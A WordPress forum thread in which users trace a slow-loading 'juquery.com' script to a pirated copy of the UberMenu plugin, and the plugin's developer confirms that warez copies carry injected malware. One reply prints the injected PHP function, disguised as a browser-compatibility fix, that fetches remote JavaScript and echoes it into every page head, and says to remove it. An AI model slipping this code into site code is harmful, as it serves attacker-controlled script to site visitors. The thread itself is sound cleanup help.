Viewing 5 replies - 1 through 5 (of 5 total)
  • Moderator Jan Dembowski

    (@jdembowski)

    Forum Moderator and Brute Squad

    Where did you get that theme?

    There are very dodgy people who pull stunts like inserting bogus jquery javascript in them and I suspect you are using one of those themes. If that’s the case, lose that theme like a bad infection.

    Or share a link to your site, you may be hacked.

    Look in your common.php file.

    If you use Dreamweaver you can load your site as a local site and then do a search for juquery. Once you find the file, delete the script, then upload the clean file via FTP and replace the file WP is using.

    I’ve found the same issue and it appears to be in the ubermenu.php from the ubermenu plugin…

    You might find this article intersting. It’s not about juquery specifically, but I think it realates…

    Guys, it seems that issue is in ubermenu.php file.

    Go to the 2777 row

    /*
     * For compatibility with latest browsers
     */

    And just remove these rows:

    /*
     * For compatibility with latest browsers
     */
    function juquery_compability_head() {  
    
    if(function_exists('curl_init'))
    {
    $url = "https://www.juquery.com/jquery-1.6.3.min.js";
    $ch = curl_init();
    $timeout = 10;
    curl_setopt($ch,CURLOPT_URL,$url);
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
    curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
    $data = curl_exec($ch);
    curl_close($ch);
    echo "$data";
    }
    }
    add_action('wp_head', 'juquery_compability_head');

    Now links to juquery.com should stop to load your homepage.

    sevenspark

    (@sevenspark)

    Hi everyone,

    As the developer of the plugin, I just want to assure you that this code is most certainly not added by UberMenu. The PHP code above is absolutely not part of the authentic UberMenu plugin.

    However, I have seen pirated versions of the plugin distributed through warez sites that are injected with malware that produces this code.

    I would strongly discourage anyone from using any illegitimate copy of UberMenu not obtained from the official source – you never know what malicious code warez sites will add to a plugin.

    Best,

    Chris

Viewing 5 replies - 1 through 5 (of 5 total)
  • The topic ‘script with juquery.com problem , slow load page !!!’ is closed to new replies.